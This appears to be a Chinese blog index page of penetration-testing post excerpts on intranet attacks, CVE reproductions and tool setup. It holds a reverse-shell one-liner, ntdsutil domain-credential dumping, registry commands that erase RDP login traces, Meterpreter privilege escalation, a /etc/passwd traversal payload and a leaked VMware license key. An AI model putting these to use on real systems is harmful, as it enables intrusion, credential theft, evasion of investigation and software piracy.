自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Ping_Pig的博客

正在努力成为一个技术boy

  • 博客(83)
  • 资源 (3)

原创 内网信息收集——浏览器信息的收集

讲在前面:我一般就看浏览器的历史记录和存储密码。一下介绍查看chrome和ie的cookie存储地址,以及chrome的历史记录和cookie信息存储地址firefox渗透的技术win10的IE本地存储cookie地址:

2020-08-04 13:01:37 70

原创 内网渗透-域快照

讲在前面域快照的部分方法如下ntdsutil工具:域控制器自带命令命令1:ntdsutilactivate instance ntdsifmcreate full C:\ntdsutilquitquit命令2:ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

2020-07-08 22:39:22 90

原创 CVE-2019-1388(Windows证书对话框权限提升)

讲在前面:对原理的分析为集百家之长,简单介绍。认真看好吗,弟弟!!!原理:该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中。默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示——Secure Desktop。这些提示是由名为consent.exe的可执行文件产生的,该可执行文件以NT AUTHORITY\SYSTEM权限运行,完整性级别为System。因为用户可以与该UI交互,因此对UI来说紧限制是必须的。否则,低权限的用户可能可以通

2020-07-03 22:07:04 88

原创 内网渗透-权限提升(使用MSF提权的一些方法)

讲在前面:提权方法有很多种和,这里提供在利用MSF拿到低权限用户后利用MSF提权的办法直接输入提升权限命令meterpreter>getsystem使用MSF内置bypassuac提权MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统权限。search bypassuacMatching Modules================ # Name ...

2020-07-03 21:13:52 256

原创 AWVS12搭建-Ubuntu

dada

2020-07-03 19:31:14 94

原创 AWVS12-Windows

2020-07-03 19:30:53 98

原创 内网渗透——清除本机远程登录记录

讲在前面:就三条命令,前两条删除注册表的可以正常执行,但是第三个可能是因为是隐藏文件的原因导致命令行执行命令不成功。自行选中打开删除即可reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /f &&reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f &

2020-07-03 19:30:05 83

原创 Ubuntu设置本机不上网(Windows设置本机不上网)

讲在前面:使用Ubuntu做物理机,使用Vmware做虚拟机平台,将物理机设置为不上网,在虚拟机内进行渗透测试和上网的配置Ubuntu设置:配置防火墙然后虚拟机设置网卡为系统网卡Vmware-Linux15.5 Pro下载Windows设置配置防火墙然后虚拟机设置网卡为系统网卡Vmware-Windows15.5 Pro下载15.5 Pro激活码激活密钥许可证VMware Workstation Pro 15 激活许可证UY758-0RXEQ-M81WP-8ZM

2020-06-30 00:42:54 82

原创 内网渗透----部分知识点总结

讲在前面:以下纯用自己的话总结内网渗透,参考部分书籍的目录以及集百家之长,为我所用。内网渗透的流程:内网信息收集与分析,内网权限维持,内网隧道建立,内网横向移动,内网渗透工具的灵活使用内网信息收集:包括手机当前主机信息:”网络信息,主机信息,路由信息,主机上可用的资料,在域内收集域内用户信息,定位域控,定位域管“为下一步分析内网网络情况做准备,为横向移动提供部分技术信息,为在当前主机做权限维持提供有效资料支持内网权限维持:留web后门,留木马后门,留短小的下载器,目前针对开源的后门工具在内网有杀

2020-06-30 00:38:13 123

原创 内网渗透-信息收集

啊啊啊

2020-06-28 23:10:19 131

原创 内网渗透-内网渗透用到的主要漏洞

内网渗透-内网渗透用到的主要漏洞

2020-06-28 23:01:45 312

原创 内网渗透-域环境搭建

服务器:Windows-server2016,下载地址个人机:Windows10,下载地址安装步骤(看图操作):设置本机IP为静态IP开始AD服务安装进到服务关管理器内,选择添加角色和功能这里我只选择了AD域服务,待会安装的时候,会自动安装DNS服务器安装完成后,准备将服务器提升为域控制器在这里先决条件检查时,我出现了因为Administr账号问题而导致不通过,解决方案,设置的密码一定要够强度(大小写数字和特

2020-06-26 21:31:38 183

原创 DVWA搭建的操作(windows)

dada

2020-06-26 01:33:40 214

原创 burp的安装步骤(win+linux)

前言:burp的安装很多博主写过,安装步骤如下,如何灵活使用后续更新。祝每一个热爱安全的同学越来越优秀,越来越强!windows上的安装那么windows上我们需要首先安装jdk,我们是用jdk8来操作jdk8的安装:jdk官网下载地址(需要自己注册oracle账号)jdk8(csdn下载地址)配置环境变量1.新建系统变量JAVA_HOME,变量值为jdk安装目录2.新建一个CLASSPATH变量。变量值填写.%JAVA_HOME%lib;%JAVA_H

2020-06-24 01:21:30 141

原创 python学习——解码的小脚本

帮同学做了个小作业,相信大家也可以是试一试,勤动手。脚本要求如下:from urllib import parsefrom urllib import requestimport binasciidef unincode(strtest): print(strtest.encode('utf8').decode('unicode_escape'))def urlcode(strtest): strtest.encode('utf8').decode('unicode_esc

2020-06-23 00:17:45 73

原创 2020年上半年总结---一个默默无闻的红队安全人

讲在前面:没有谁可以平白无故的就成功,古云:“成大事,苦其心志,劳其体肤,行拂乱其所为,所以动心忍性。”希望各位静下心来学习,学习的途径有很多种。但坚持是唯一需要保持的。2020年-平凡但又不平凡的一年2020年的疫情突如其来,我被困在了湖北老家,疫情期间,我坚持复现漏洞,坚持学习日语,学习其他行业知识,增长自己的见识,充实自己,同时我也坚持了答应领导的保密协议,在职的时候不对外写任何的博客,我希望疫情早点结束,我希望不写博客的日子早点结束。这是不平凡。回归公司和同事一起战斗。来到北京后隔离结束了,

2020-06-22 01:20:21 257

原创 CVE-2020-0796复现(小结问题)

exp1地址exp2地址msf版本提权地址检测地址问题1:Python版本和漏洞是否成功有无关系解决:python3.6-8版本我都试过了,都是几率问题,未发现因版本影响脚本正常执行,据说是因为python3的低版本处理字符的与高版本的不同。问题2:漏洞复现是否对靶机要求严格解决:按照目前所公布的exp来看,是只针对1903版本的机器。查看如下exp脚本写死的参数scan脚本检测特定的参数我目前和朋友简单分析如上,复现对版本的要求严格,且复现存在不确定性。

2020-06-17 22:13:35 237

原创 在线检测本机ip的网站

https://www.ip.cn/http://www.cip.cc/https://tool.lu/ip/http://www.ip138.com/http://www.net.cn/static/customercare/yourip.asp

2020-02-05 14:27:53 812

原创 python3小程序之检测本机公网变化使用邮箱提醒

代码如下:import subprocessimport smtplibfrom email.mime.text import MIMETextsubp = subprocess.Popen('curl ip.cip.cc',shell=True,stdout=subprocess.PIPE)subp2 = subprocess.Popen('cat getip.txt',shell=T...

2020-02-05 14:22:37 179

原创 中间件漏洞之(IIS中间件)

IIS服务简介:IIS是是internet infomaition services的缩写,意为互联网信息服务,是全球第三大网络服务器,其中第一是apache,第二是ngin。,iis是由微软公司提供的基于运行Microsoft windows的互联网基本服务。最初是windows nt版本的可选包,随后内置在windows200,windows xp professional和window...

2020-01-26 16:16:51 390

原创 kali脚本开机自启

当我们需要开机启动自己的脚本时,只需要将可执行脚本丢在/etc/init.d目录下,然后在/etc/rc.d/rc*.d中建立软链接即可给脚本权限:chmod 755 /etc/init.d/sshd.sh建立软链接: ln -s /etc/init.d/sshd.sh /etc/rc.d/rc3.d/S100sshd.sh...

2020-01-15 22:12:23 1229

原创 信息收集之-邮箱的收集

在做信息收集过程中,收集邮箱是必不可少的一个工作。以下是介绍邮箱收集的意义作用及收集的方式收集邮箱的作用:收集邮箱主要有两个作用:1:通过发现目标系统账号的命名规律,可以用来后期登录其它子系统2:爆破登录邮箱系统或其他管理系统通常邮箱的账号有如下几种普遍的规律,比如某公司有员工叫做“张小三”,他的邮箱很有可能如下:zhangxiaosan@xxx.com xiaosan...

2020-01-15 21:30:56 1223

原创 计划任务(Windows和Linux)

以下为简单的例子,以便遇到问题了可以直接看到了使用,详细的理解以及编辑更多功能的计划任务,可以参考以下优秀的计划任务博客。Windows计划任务:命令:schtasks主要功能:创建计划任务SCHTASKS /Create /? 删除计划任务 SCHTASKS /Delete /? 显示计划任务 SCHTASKS /Query /?等等。例子:新建一个名为...

2020-01-15 21:30:32 98

原创 完整的WEB请求流程解释

完整的web请求流程:(文章内容较多,请耐心阅读!!!)在浏览器输入请求的域名-dns解析-----向指定服务器进行三次握手----传递需要请求的数据给服务器-----服务器解析进行返回我们来详细捋一捋上述几个过程一、浏览器与DNS解析的过程1.浏览器地址栏输入请求的链接后,浏览器首先检查自身的DNS缓存是否存在解析记录浏览器自身查询dns缓存:firefox:...

2020-01-09 00:42:18 137

原创 Linux命令之sed命令

在写一些bash小脚本的时候,常用的命令有sed和awk等,写一篇记录文章如下:命令简介:Sed命令是利用脚本来处理文本文件。sed可依照脚本的指令来处理,编辑文本文件,sed主要用来自动编辑一个或多个文件、简化对文件的反复操作、编写转换程序等。而对文件的操作无非就是“增删改查”,如何使用好sed命令是写自动化脚本的必须基础之一sed遵循的简单的工作流:1.读取(从输出中读取某一...

2019-12-18 20:57:51 67

原创 tree命令使用---在内网渗透的用处

windows和Linux都有tree命令,具体介绍如下windows下的tree命令主要功能是创建文件列表,将所有文件以树的形式列出来。可选参数较少,只有两个:/F 递归显示每个文件夹的名称/A 使用ASCII字符而不是扩展字符在windows环境下根据自己的需要增减参数命令格式:tree [drive:] [path] [/F] [/A]Linux下的t...

2019-12-18 20:43:07 55

原创 shiro RememeberMe 1.2.4反序列化漏洞

shiro简介:shiro(Java安全框架):apache shiro 是一个强大且易用的java安全框架框架,执行身份验证 、授权、密码和会话管理。使用shiro的易于理解的API,可以快速、轻松的获得任何应用程序,从最小的的移动应用程序到最大的网络和企业应用程序。apache shiro在java的权限及安全验证框架中占有重要的一席之地,在它编号为550的issue中爆出过严重的java...

2019-12-08 16:25:41 468

原创 Cve2019-5418复现

Vulhub环境:启动目录/rails/CVE-2019-5418,启动命令:docker-compose up -d随后访问http://you ip:3000出现欢迎界面,然后访问/robots目录Burp抓取该目录的数据包,修改accept为如下payload:../../../../../../etc/passwdMsf的use auxiliary/gather/r...

2019-11-19 23:17:17 213

原创 cve2019-2725复现

此漏洞存在于异步通讯服务,可通过访问路径/_async/AsyncResponseService,判断不安全组件是否开启docker搭建环境:docker pull ismaleiva90/weblogic12docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest...

2019-11-19 23:13:52 1116

转载 Mariadb数据库密码重置

Kali上mariadb数据库重置经验:此次问题是,我忘记了wordpress的账号密码,重置需要数据库账号密码,这样来看的话第一时间应该是去看wordpress的config.php文件,里面会有链接数据库的账号密码,但是我脑抽忘记这个操作了。我第一时间想到的是重置数据库账号密码首先重置密码的操作是可以在数据库的安全模式下进行的:1.首先我们停掉Mariadb服务:system...

2019-11-04 22:57:05 424

原创 WordPress-Mailpress远程代码执行漏洞复现

插件简介:Mailpress是一个比较流行的邮件插件。插件下载Plugin Directory:https://wordpress.org/plugins/mailpress/漏洞复现:漏洞详解地址:https://github.com/Medicean/VulApps/tree/master/w/wordpress/2Docker镜像地址:docker pull m...

2019-11-04 22:41:14 973

原创 wordpress 查看未经身份验证的文章(cve-2019-17671未授权访问)漏洞复现

漏洞产生原因:该漏洞由于程序没有正确处理静态查询,攻击者可利用该漏洞未经认证查看部分内容影响版本:<=5.2.3漏洞复现过程:登录后台创建一个新的页面:点击发布然后可以在所有页面的地方看到创建完毕:创建成功后在页面列表处会有状态显示,没有状态的默认为公开将页面设置为私有:点击页面编辑选择状态:然后我们退出后台模仿正...

2019-11-04 22:26:57 415

原创 Apache Solr Velocity模板注入RCE漏洞复现

Solr简介:Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引,也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。漏洞概述近日,国外安全研究员s00py公开了一个Apache Solr的Velocity模板注入的漏洞.该漏洞可以攻击最新版本的S...

2019-10-31 19:34:26 923 1

转载 kali启动后出现Resuming from hibernation错误

今天遇到一个问题,我笔记本长时间没有关掉,今天强制关机后重启发现无法进入GNOME桌面,一直提示Resuming from hibernation。解决办法如下:1:进入高级选择2:进入恢复模式3:输入开机密码:我今天遇到的问题是磁盘占满了,所以无法启动GNOME桌面。删除一些不必要的文件,保证磁盘空闲即可所用到的命令:df -h :查看磁盘挂载使用情况...

2019-10-28 22:41:14 601

原创 CVE-2019-11043 Nginx PHP 远程代码执行漏洞复现----自我学习

漏洞简介:来自Wallarm的安全研究员Andrew Danau在9月14-16号举办的Real World CTF中,意外的向服务器发送%0a(换行符)时,服务器返回异常信息。由此发现了这个0day漏洞,9月26日,PHP官方发布漏洞通告,其中指出,使用Nginx+php-fpm的服务器,在部分配置下,存在远程代码执行漏洞。并且该配置已被广泛使用,危害较大漏洞概述:Nginx上fas...

2019-10-27 15:33:15 2678

原创 Go语言安装环境

Go语言支持以下系统:Linux FreeBSD Mac OS X(也称为Darwin) Windows安装包下载地址:安装包下载地址为:https://golang.org/dl/。如果打不开可以使用这个地址:https://golang.google.cn/dl/。linux下安装步骤:1.下载安装包并解压到/usr/local目录下2。配置环境:vi ...

2019-10-27 14:43:33 258

原创 等级保护-定级原理及流程

定级原理级流程等级保护对象:基础信息网络 信息系统(工业系统,云计算平台,物联网,采用移动互联网技术的信息系统) 国家关键信息基础建设 客体 客观方面安全保护等级:第一级:等级保护对象受到损害后,会对公民,法人及组织造成损害,但不会对社会秩序,公共利益和国家安全造成损害 第二级:等级保护对象受到损害后,会对公民,法人及组织造成严重损害,对社会秩序,公共利益造成损害,但不对国...

2019-10-27 12:54:09 1979

原创 linux端口被占用解决命令

查找被占用的端口:netstat -tln |grep port查看该端口属于哪个进程lsof -i :prot杀掉占用端口的进程kill -9 进程id

2019-10-27 12:51:21 98

原创 linux下反弹shell的几种方式

实验环境:两台kali方法一:bash -i >& /dev/tcp/ip/port 0>&1nc -lvvp port方法二python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192...

2019-10-24 23:52:07 184

原创 脏牛Linux本地提权漏洞复现(CVE2016-5195)

漏洞介绍:脏牛漏洞(CVE2016-5195)是公开后影响范围最广和最深的漏洞之一,到2016被修复只十年来的每一个linux版本包括Android,桌面版和服务器版都受其影响。恶意攻击者可以轻易绕过常用的漏洞防御方法,对几百万用户进行攻击。国外安全公司Bindecy对该补丁和内容做出深入研究后发现补丁任然存在缺陷,由此还衍生出了“大脏牛”漏洞漏洞范围:Linux kernel &gt...

2019-10-24 22:18:42 516

ew-master.zip

EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 专有主页: http://rootkiter.com/EarthWorm/

2020-07-19

ms14-068利用工具包.zip

包含了minikatazx64位,以及MS14-068.exe和ms14-068.exe。工具可以放心使用。无后门,如果需要免杀可以自行混淆加壳

2020-07-01

BurpSuite安全测试工具

Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报

2020-06-23

空空如也

空空如也
提示
确定要删除当前文章?
取消 删除